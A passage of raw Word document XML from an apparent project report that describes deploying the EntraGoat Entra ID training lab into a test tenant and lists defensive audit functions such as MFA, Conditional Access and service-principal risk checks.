          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What the repository contains out of the box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B7B6A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start-EntraGoat.ps1 — main entry point: a PowerShell/WPF GUI listing all challenges, hints, credentials, and Run Setup / Run Cleanup buttons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A74F1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scenarios/ — one setup script, one cleanup script and one official solution walkthrough script per scenario (e.g. EntraGoat-Scenario1-Setup.ps1, -Cleanup.ps1, -Solution.ps1), each creating or removing the scenario's deliberately misconfigured users, groups, apps and role assignments in the target tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA4F673" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frontend/ — an optional Node.js/React web UI (npm install &amp;&amp; npm start) as an alternative to the PowerShell GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F7CC2" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docs/getting-started.md — prerequisites, installation and troubleshooting documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1F64A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>README.md and standard repository files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C427098" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE6267F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What was used as-is: the entire repository was used unmodified. Start-EntraGoat.ps1 was run directly to deploy Scenario 1 into the Pearson tenant; the built-in EntraGoat-Scenario1-Setup.ps1 and EntraGoat-Scenario1-Cleanup.ps1 handled object creation and teardown; EntraGoat-Scenario1-Solution.ps1 was reviewed afterward as the official reference walkthrough, after the scenario had already been solved manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FC793" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What this project added on top: nothing — no custom files were created inside this repository. All interaction was through its existing GUI and scripts, run from PowerShell against the Pearson tenant; the project's own tooling (graph_client.py, entra_agent.py) lives entirely in the separate azure-ai-agents-labs repository and queries the same tenant independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307852E8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311558B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc243301441"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix A — Tool Index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="1B0B5F02" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Functions implemented across graph_client.py and entra_agent.py:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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3900"/>
        <w:gridCol w:w="5600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="41FE257F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E489B55" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="627BC9EB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="18CFC406" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DF14CE8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_users, get_guests, get_global_admins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D203CF8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tenant user and admin inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="3646332E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="759FCA0E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_ca_policies, check_legacy_auth_blocked, check_admin_mfa_policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E177DEA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Conditional Access checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="00F0CE70" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E2635E4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_mfa_status, get_admins_without_mfa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AEE3EEC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MFA registration status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="79375098" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="312C44FA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_security_defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A5EFDB2" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Security Defaults status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="663C6569" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A1BBEE1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_service_principals, get_risky_service_principals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7576B64C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Service principal inventory and risk scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="773B87D0" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="360B6B40" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_sp_role_assignments, get_sp_directory_roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F1E449F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Per-SP permission and directory-role lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="38D584C8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41D620BC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_user_owned_objects, get_user_owned_devices, get_user_owned_groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EB2B4F9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Per-user ownership enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7F4C997B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7253BBB4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_role_members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1154DA6F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Role-wide membership lookup by role name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38A8F6A0" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450A242D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc243301442"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Appendix B — Source Repository</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="311ABA33" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All source code (graph_client.py, entra_agent.py, hello.py, agent.py) is version-controlled and pushed to the author's private GitHub repository, with .env and .venv/ excluded via .gitignore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696606EC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
